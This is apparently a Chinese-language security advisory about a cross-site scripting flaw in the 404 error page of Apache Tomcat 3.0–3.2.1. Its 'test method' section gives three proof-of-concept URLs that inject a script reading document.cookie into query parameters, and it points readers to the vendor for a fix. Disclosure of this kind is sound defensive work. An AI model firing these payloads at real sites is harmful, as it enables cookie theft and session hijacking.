当前位置: 安全纵横 > 安全公告

Apache Tomcat 404错误页跨站脚本漏洞

更新日期:2009-12-01
受影响系统:
Apache Software Foundation Tomcat 3.2.1
Apache Software Foundation Tomcat 3.2
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
Apache Software Foundation Tomcat 3.0
描述:
Apache Tomcat是一款开放源码的JSP应用服务器程序。
Apache Tomcat不正确过滤用户输入,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。
由于不正确处理404错误页面,在返回给用户后,可导致恶意脚本代码在目标浏览器上执行,泄漏敏感信息。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1
厂商补丁:
用户可联系供应商获得最新版本:

http://tomcat.apache.org/